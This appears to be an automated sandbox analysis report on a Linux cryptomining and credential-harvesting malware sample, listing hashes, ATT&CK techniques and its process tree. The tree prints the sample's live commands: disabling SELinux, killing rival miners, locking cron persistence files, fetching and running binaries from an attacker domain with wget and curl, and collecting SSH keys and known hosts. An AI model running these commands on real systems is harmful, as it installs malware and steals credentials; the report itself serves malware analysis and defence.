ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183

General

Target

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Size

11KB
MD5

1196d0a31402b04a32aa582ae6d2c15b
SHA1

5d6a8c0437bdf30079188283b0e60d063e649f27
SHA256

ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183
SHA512

cb9e5c0b2a430bd2963b64e659cb2cb65f20d53888e6a188f9831a65c0dd568550439423ff2349c7100e09f45ba3b07e97688c1d9190b2bc1d7a595f310cb28a
SSDEEP

192:fQ6PgM8PvaA0Rj1veSS7MYtGRwcY3Pkfz216zPEDAzQSvmgVgIbc1H7vjjB4C1v6:fQ6PgM8PvaA0Rj1vy7fmjwMxzgX17j/s

Score

7^/10

antivm persistence

Malware Config

Signatures

Executes dropped EXE 4 IoCs

Processes:

dbuseddbusedbashirccruner

ioc pid process

/tmp/dbused 1673 dbused
/tmp/dbused 1675 dbused
/tmp/bashirc 1700 bashirc
/dev/shm/cruner 1719 cruner
Attempts to change immutable files 5 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

chattrchattrgrepgrepchattr

pid process

1785 chattr
1614 chattr
1616 grep
1618 grep
1620 chattr
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

grep

description ioc process

File opened for reading /proc/cpuinfo grep

ioc	pid	process
/tmp/dbused	1673	dbused
/tmp/dbused	1675	dbused
/tmp/bashirc	1700	bashirc
/dev/shm/cruner	1719	cruner

pid	process
1785	chattr
1614	chattr
1616	grep
1618	grep
1620	chattr

description	ioc	process
File opened for reading	/proc/cpuinfo	grep

Creates/modifies Cron job 1 TTPs 6 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

description	ioc	process
File opened for modification	/etc/cron.d/apache	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/etc/cron.d/nginx	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/var/spool/cron/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/var/spool/cron/crontabs/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/etc/cron.hourly/oanacroner1
File opened for modification	/etc/cron.d/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

Disables SELinux 10 IoCs
Disables SELinux security module.

Processes:

grepgrepgrepgrepsleepsleepsetenforcegrepgrepsleep

pid process

1550 grep
1577 grep
1589 grep
1693 grep
1814 sleep
1825 sleep
1516 setenforce
1556 grep
1595 grep
1721 sleep
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
1550	grep
1577	grep
1589	grep
1693	grep
1814	sleep
1825	sleep
1516	setenforce
1556	grep
1595	grep
1721	sleep

Reads CPU attributes 1 TTPs 18 IoCs

System Information Discovery

T1082

Processes:

killkillkillkillkillkillpskillkillkillkillkillpskillkillkillpskill

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspssystemctlsystemctlsed

description	ioc	process
File opened for reading	/proc/199/status	ps
File opened for reading	/proc/1164/cmdline	ps
File opened for reading	/proc/1712/status	ps
File opened for reading	/proc/30/cmdline	ps
File opened for reading	/proc/198/status	ps
File opened for reading	/proc/1135/status	ps
File opened for reading	/proc/956/status	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/1171/status	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/157/stat	ps
File opened for reading	/proc/28/status	ps
File opened for reading	/proc/942/stat	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/156/status	ps
File opened for reading	/proc/1280/cmdline	ps
File opened for reading	/proc/1121/cmdline	ps
File opened for reading	/proc/89/cmdline	ps
File opened for reading	/proc/1065/stat	ps
File opened for reading	/proc/1280/cmdline	ps
File opened for reading	/proc/483/stat	ps
File opened for reading	/proc/487/status	ps
File opened for reading	/proc/1510/cmdline	ps
File opened for reading	/proc/168/stat	ps
File opened for reading	/proc/1260/stat	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/1139/status	ps
File opened for reading	/proc/34/status	ps
File opened for reading	/proc/445/status	ps
File opened for reading	/proc/1000/stat	ps
File opened for reading	/proc/1171/stat	ps
File opened for reading	/proc/1153/status	ps
File opened for reading	/proc/1515/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/158/status	ps
File opened for reading	/proc/115/cmdline	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/34/cmdline	ps
File opened for reading	/proc/443/status	ps
File opened for reading	/proc/1135/status	ps
File opened for reading	/proc/35/status	ps
File opened for reading	/proc/1151/status	ps
File opened for reading	/proc/171/stat	ps
File opened for reading	/proc/445/cmdline	ps
File opened for reading	/proc/1049/stat	ps
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/157/stat	ps
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/1133/stat	ps
File opened for reading	/proc/487/cmdline	ps
File opened for reading	/proc/519/cmdline	ps
File opened for reading	/proc/169/status	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/158/status	ps
File opened for reading	/proc/445/cmdline	ps

Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

description ioc process

File opened for modification /dev/shm/cruner 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.

Processes:

description ioc

File opened for modification /tmp/dbused
File opened for modification /tmp/bashirc

description	ioc	process
File opened for modification	/dev/shm/cruner	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

description	ioc
File opened for modification	/tmp/dbused
File opened for modification	/tmp/bashirc

/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
1⤵
- Creates/modifies Cron job
- Writes file to shm directory
PID:1515

/usr/sbin/setenforce
setenforce 0
2⤵
- Disables SELinux
PID:1516

/bin/grep
grep -c processor /proc/cpuinfo
2⤵
- Checks CPU configuration
PID:1517

/sbin/sysctl
sysctl -w "vm.nr_hugepages=3"
2⤵
PID:1518

/usr/bin/xargs
xargs kill -9
2⤵
PID:1523

/sbin/kill
kill -9
3⤵
PID:1524

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1524

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1522

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1521

/bin/grep
grep :3333
2⤵
PID:1520

/usr/bin/xargs
xargs kill -9
2⤵
PID:1529

/sbin/kill
kill -9
3⤵
PID:1530

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1530

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1528

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1527

/bin/grep
grep :4444
2⤵
PID:1526

/usr/bin/xargs
xargs kill -9
2⤵
PID:1535

/sbin/kill
kill -9
3⤵
PID:1536

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1536

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1534

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1533

/bin/grep
grep :5555
2⤵
PID:1532

/usr/bin/xargs
xargs kill -9
2⤵
PID:1541

/sbin/kill
kill -9
3⤵
PID:1542

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1542

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1540

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1539

/bin/grep
grep :7777
2⤵
PID:1538

/usr/bin/xargs
xargs kill -9
2⤵
PID:1547

/sbin/kill
kill -9
3⤵
PID:1548

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1548

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1546

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1545

/bin/grep
grep :14444
2⤵
PID:1544

/usr/bin/xargs
xargs kill -9
2⤵
PID:1553

/sbin/kill
kill -9
3⤵
PID:1554

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1554

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1552

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1551

/bin/grep
grep :5790
2⤵
- Disables SELinux
PID:1550

/usr/bin/xargs
xargs kill -9
2⤵
PID:1559

/sbin/kill
kill -9
3⤵
PID:1560

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1560

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1558

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1557

/bin/grep
grep :45700
2⤵
- Disables SELinux
PID:1556

/usr/bin/xargs
xargs kill -9
2⤵
PID:1565

/sbin/kill
kill -9
3⤵
PID:1566

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1566

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1564

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1563

/bin/grep
grep :2222
2⤵
PID:1562

/usr/bin/xargs
xargs kill -9
2⤵
PID:1574

/sbin/kill
kill -9
3⤵
PID:1575

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1575

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1573

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1572

/bin/grep
grep :9999
2⤵
PID:1571

/usr/bin/xargs
xargs kill -9
2⤵
PID:1580

/sbin/kill
kill -9
3⤵
PID:1581

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1581

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1579

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1578

/bin/grep
grep :20580
2⤵
- Disables SELinux
PID:1577

/usr/bin/xargs
xargs kill -9
2⤵
PID:1586

/sbin/kill
kill -9
3⤵
PID:1587

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1587

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1585

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1584

/bin/grep
grep :13531
2⤵
PID:1583

/usr/bin/xargs
xargs kill -9
2⤵
PID:1592

/sbin/kill
kill -9
3⤵
PID:1593

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1593

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1591

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1590

/bin/grep
grep 23.94.24.12:8080
2⤵
- Disables SELinux
PID:1589

/usr/bin/xargs
xargs kill -9
2⤵
PID:1598

/sbin/kill
kill -9
3⤵
PID:1599

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1599

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1597

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1596

/bin/grep
grep 134.122.17.13:8080
2⤵
- Disables SELinux
PID:1595

/bin/grep
grep 107.189.11.170:443
2⤵
PID:1601

/usr/bin/xargs
xargs kill -9
2⤵
PID:1604

/sbin/kill
kill -9
3⤵
PID:1605

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1605

/bin/sed
sed -e "s/\\/.*//g"
2⤵
- Reads runtime system information
PID:1603

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1602

/usr/bin/chattr
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
2⤵
- Attempts to change immutable files
PID:1614

/bin/grep
grep -i "[a]liyun"
2⤵
- Attempts to change immutable files
PID:1616

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1615

/bin/grep
grep -i "[y]unjing"
2⤵
- Attempts to change immutable files
PID:1618

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1617

/bin/sleep
sleep 1
2⤵
PID:1619

/usr/bin/chattr
chattr -ai /tmp/dbused
2⤵
- Attempts to change immutable files
PID:1620

/bin/mkdir
mkdir -p /var/spool/cron/crontabs
2⤵
PID:1655

/bin/mkdir
mkdir -p /etc/cron.hourly
2⤵
PID:1656

/bin/chmod
chmod 755 /etc/cron.hourly/oanacroner1
2⤵
PID:1658

/bin/uname
uname -m
2⤵
PID:1669

/usr/bin/wget
wget -q -O - http://bash.givemexyz.in/x86_64
2⤵
PID:1670

/bin/chmod
chmod +x /tmp/dbused
2⤵
PID:1671

/bin/chmod
chmod +x /tmp/dbused
2⤵
PID:1672

/tmp/dbused
/tmp/dbused -c
2⤵
- Executes dropped EXE
PID:1673

/tmp/dbused
/tmp/dbused -pwn
2⤵
- Executes dropped EXE
PID:1675

/bin/sleep
sleep 5
2⤵
PID:1677

/bin/uname
uname -m
2⤵
PID:1696

/usr/bin/wget
wget -q -O - http://bash.givemexyz.in/bashirc.x86_64
2⤵
PID:1697

/bin/chmod
chmod +x /tmp/bashirc
2⤵
PID:1698

/bin/chmod
chmod 777 /tmp/bashirc
2⤵
PID:1699

/tmp/bashirc
/tmp/bashirc
2⤵
- Executes dropped EXE
PID:1700

/bin/systemctl
systemctl is-active cron
2⤵
- Reads runtime system information
PID:1702

/bin/systemctl
systemctl is-active crond
2⤵
- Reads runtime system information
PID:1703

/bin/systemctl
systemctl is-active atd
2⤵
PID:1704

/usr/bin/whoami
whoami
2⤵
PID:1708

/usr/bin/xargs
xargs kill -9
2⤵
PID:1715

/sbin/kill
kill -9
3⤵
PID:1717

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:1717

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1714

/bin/grep
grep cruner
2⤵
PID:1713

/bin/grep
grep -v grep
2⤵
PID:1712

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1711

/bin/chmod
chmod 777 /dev/shm/cruner
2⤵
PID:1718

/bin/sleep
sleep 15
2⤵
PID:1720

/usr/bin/nohup
nohup /dev/shm/cruner
2⤵
PID:1719

/dev/shm/cruner
/dev/shm/cruner
2⤵
- Executes dropped EXE
PID:1719

/bin/sh
/bin/sh /dev/shm/cruner
2⤵
PID:1719

/bin/sleep
sleep 60
3⤵
- Disables SELinux
PID:1721

/bin/bash
bash -sh
3⤵
PID:1807

/usr/bin/lwp-download
lwp-download http://bash.givemexyz.in/xms /tmp/xms
3⤵
PID:1810

/bin/bash
bash /tmp/xms
3⤵
PID:1811

/tmp/xms
/tmp/xms
3⤵
PID:1812

/bin/rm
rm -rf /tmp
3⤵
PID:1813

/bin/sleep
sleep 60
3⤵
- Disables SELinux
PID:1814

/bin/bash
bash -sh
3⤵
PID:1818

/usr/bin/lwp-download
lwp-download http://bash.givemexyz.in/xms /tmp/xms
3⤵
PID:1821

/bin/bash
bash /tmp/xms
3⤵
PID:1822

/tmp/xms
/tmp/xms
3⤵
PID:1823

/bin/rm
rm -rf /tmp
3⤵
PID:1824

/bin/sleep
sleep 60
3⤵
- Disables SELinux
PID:1825

/bin/rm
rm -rf /dev/shm/cruner
2⤵
PID:1727

/bin/grep
grep -q "http://bash.givemexyz.in\\|104.244.75.159"
2⤵
PID:1729

/usr/bin/crontab
crontab -l
2⤵
PID:1728

/bin/rm
rm -rf /tmp/2start.jpg
2⤵
PID:1783

/bin/rm
rm -rf /tmp/xmi
2⤵
PID:1784

/usr/bin/chattr
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
2⤵
- Attempts to change immutable files
PID:1785

/usr/bin/head
head -n1
1⤵
PID:1609

/usr/bin/sort
sort -R
1⤵
PID:1608

/usr/bin/seq
seq 0 255
1⤵
PID:1607

/usr/bin/head
head -n1
1⤵
PID:1613

/usr/bin/sort
sort -R
1⤵
PID:1612

/usr/bin/seq
seq 0 255
1⤵
PID:1611

/bin/grep
grep -v 127
1⤵
PID:1625

/bin/grep
grep -oP "inet\\s+\\K\\d{1,3}\\.\\d{1,3}"
1⤵
PID:1624

/bin/grep
grep -v inet6
1⤵
PID:1626

/bin/grep
grep "BROADCAST\\|inet"
1⤵
PID:1623

/bin/grep
grep -v 255
1⤵
PID:1627

/usr/bin/head
head -n1
1⤵
PID:1628

/sbin/ip
ip a
1⤵
PID:1622

/bin/grep
grep "bytes of data"
1⤵
PID:1631

/usr/bin/wc
wc -l
1⤵
PID:1632

/bin/ping
ping -c 1 pool.supportxmr.com
1⤵
PID:1630

/bin/grep
grep "bytes of data"
1⤵
PID:1653

/usr/bin/wc
wc -l
1⤵
PID:1654

/bin/ping
ping -c 1 bash.givemexyz.in
1⤵
PID:1652

/bin/grep
grep -v grep
1⤵
PID:1663

/bin/grep
grep "LISTEN\\|ESTABLISHED\\|TIME_WAIT"
1⤵
PID:1662

/bin/grep
grep "212.114.52.24:8080\\|194.5.249.24:8080"
1⤵
PID:1661

/bin/grep
grep -v grep
1⤵
PID:1668

/bin/grep
grep ESTABLISHED
1⤵
PID:1667

/bin/grep
grep "212.114.52.24:8080\\|194.5.249.24:8080"
1⤵
PID:1666

/bin/grep
grep ESTABLISHED
1⤵
PID:1694

/bin/grep
grep 104.168.71.132:80
1⤵
- Disables SELinux
PID:1693

/bin/grep
grep -v grep
1⤵
PID:1695

/bin/grep
grep -vw pub
1⤵
PID:1732

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "id_rsa*"
1⤵
PID:1731

/bin/grep
grep IdentityFile
1⤵
PID:1735

/usr/bin/awk
awk -F IdentityFile "{print \$2 }"
1⤵
PID:1736

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:1734

/usr/bin/uniq
uniq
1⤵
PID:1739

/usr/bin/find
find /root/ /root /home -maxdepth 3 -name "*.pem"
1⤵
PID:1738

/usr/bin/awk
awk -F HostName "{print \$2}"
1⤵
PID:1743

/bin/grep
grep HostName
1⤵
PID:1742

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:1741

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:1747

/bin/grep
grep -E "(ssh|scp)"
1⤵
PID:1746

/bin/cat
cat /root/.bash_history "/home/*/.bash_history" /root/.bash_history
1⤵
PID:1745

/usr/bin/uniq
uniq
1⤵
PID:1751

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:1750

/bin/cat
cat "/root/*/.ssh/known_hosts" "/home/*/.ssh/known_hosts" /root/.ssh/known_hosts
1⤵
PID:1749

/usr/bin/xargs
xargs find
1⤵
PID:1755

/sbin/find
find
2⤵
PID:1760

/bin/find
find
2⤵
PID:1760

/usr/sbin/find
find
2⤵
PID:1760

/usr/bin/find
find
2⤵
PID:1760

/usr/bin/awk
awk /id_rsa/
1⤵
PID:1756

/usr/bin/awk
awk -F/ "{print \$3}"
1⤵
PID:1757

/usr/bin/uniq
uniq
1⤵
PID:1754

/usr/bin/uniq
uniq
1⤵
PID:1758

/bin/grep
grep -v "\\.ssh"
1⤵
PID:1759

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "\\.ssh"
1⤵
PID:1753

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1763

/usr/bin/nl
nl
1⤵
PID:1764

/usr/bin/sort
sort -n
1⤵
PID:1766

/usr/bin/sort
sort -u -k2
1⤵
PID:1765

/usr/bin/cut
cut -f2-
1⤵
PID:1767

/usr/bin/sort
sort -u -k2
1⤵
PID:1773

/usr/bin/sort
sort -n
1⤵
PID:1774

/usr/bin/nl
nl
1⤵
PID:1772

/usr/bin/cut
cut -f2-
1⤵
PID:1775

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1771

/bin/grep
grep -vw 127.0.0.1
1⤵
PID:1770

/usr/bin/cut
cut -f2-
1⤵
PID:1782

/usr/bin/sort
sort -n
1⤵
PID:1781

/usr/bin/sort
sort -u -k2
1⤵
PID:1780

/usr/bin/nl
nl
1⤵
PID:1779

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1778

/usr/bin/curl
curl -fsSL http://bash.givemexyz.in/xms
1⤵
PID:1808

/usr/bin/curl
curl -fsSL http://bash.givemexyz.in/xms
1⤵
PID:1819

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/dev/shm/cruner
Filesize
312B

MD5
a2ace111ba7b74d185b49324858ea66b

SHA1
264073c1cec4e3e0f0e68994e8e9603e2b15af5e

SHA256
e83e8403225c0780132b3841c7ee6d09a131076cd60131c082140d5b86dfd044

SHA512
d3edd18d880a7fe9226d4ebfddd6d1043041e278f22cd818cd82f9c4457de1a75a08055c6aa8ffbf3793b239d698a010460f84a4492bcee6daa4c50907be9af8

Download Submit
/etc/cron.d/apache
Filesize
284B

MD5
9e9f6a486d0ea5976184c95a2f52cd49

SHA1
e44fe455508309e8e21f9f33fffcc7eecca0de57

SHA256
4d63cb713eb9c5f6082e7eb63dd3811d0b6f1e5d35fa3589c201496b222d2337

SHA512
1af5c94549c6f06ce522ee026da795226d3566e4868816844e9a6c7e3ffb7edb8b3457ac3cfe5c23f17e21b66e8464c9f79decc866f37e862f5e750307d273b1

Download Submit
/etc/cron.d/nginx
Filesize
284B

MD5
69f8fe8920f737d807cfda8f9d2ff2dd

SHA1
df11f2d59edac589962a0178e50b6117d18a1933

SHA256
5ad7db249a177b46bcb4b5e36ae590fe154b33fec7924bdf61481d281d3c2b8e

SHA512
034bd9e34f0deb1d7656ae2c914a304a4efca6920de9d1082a845cdb2ec13c71d46bc0a025a975125169e46c31ac87b7a73f4dc5b8e999e4b24308219f3c2137

Download Submit
/etc/cron.d/root
Filesize
284B

MD5
ddb2c00af645c486a790ed6d180b8819

SHA1
4ff1fc702a6d0bbf4cca6be1b2f3ef4d492a9340

SHA256
8f05cba82e2eb4ced38eb907928abce67112ebced31d4622428ddadc2d7a1120

SHA512
1f29d87c3d78bd42706a7eeedc7557f0d0370436a14cd2279bffa2af58036e1a6350b935b08c8635a9193d3f76e9d76ff3a9c08bfada64ef74f914b3354677a4

Download Submit
/etc/cron.hourly/oanacroner1
Filesize
264B

MD5
5cc2369275d33b8007781d1024edca44

SHA1
3e977f6e183c114affa947b2a2a70f7159ccddcc

SHA256
4a123c1f9cb0b49e960603805f087bb73ad26ff72176eba5089ced91823c92fe

SHA512
94ecd7e71c2e1edd1b466154aa24f4715d53826e4dafd0fe65123d98f96a08cdd9793dbc5403a47a4a87549eb16c503424e9d799f954c3dc2191d2ac2777ea49

Download Submit
/var/spool/cron/crontabs/root
Filesize
277B

MD5
e3d993445d42ab3ed35d78335d8ae5a3

SHA1
515765b31ed7b7098c12b7baae361fc86f6903ca

SHA256
6a1c7caaf79b92073f63e1d84ce8bde50e85bfffe03a7f26d6d1264f685194bd

SHA512
006c013726d50d6f1de60c5ff63fcfd881d219f25e66f1011630772443e4a827ff2148cda34eac6f66cb01256edf0f875815bb13836b3b942930cb1be7ca766f

Download Submit
/var/spool/cron/root
Filesize
280B

MD5
3abb4bc980da82bb669c1640539c5316

SHA1
be90d689bd325d72f544ab87eed84871a0130f3d

SHA256
6b0977f4e9b0023b95cb213ecfd85870db7617cb9db493a6126daf11ace4a71b

SHA512
ab1b09cf8751758ca9fc323d6ce21d4bf34267486b96e41d256a9983df23694a73e73c5b5e245a78055471db0f48e4cea4a9e26f8dbf73924fcc4649f59963ff

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads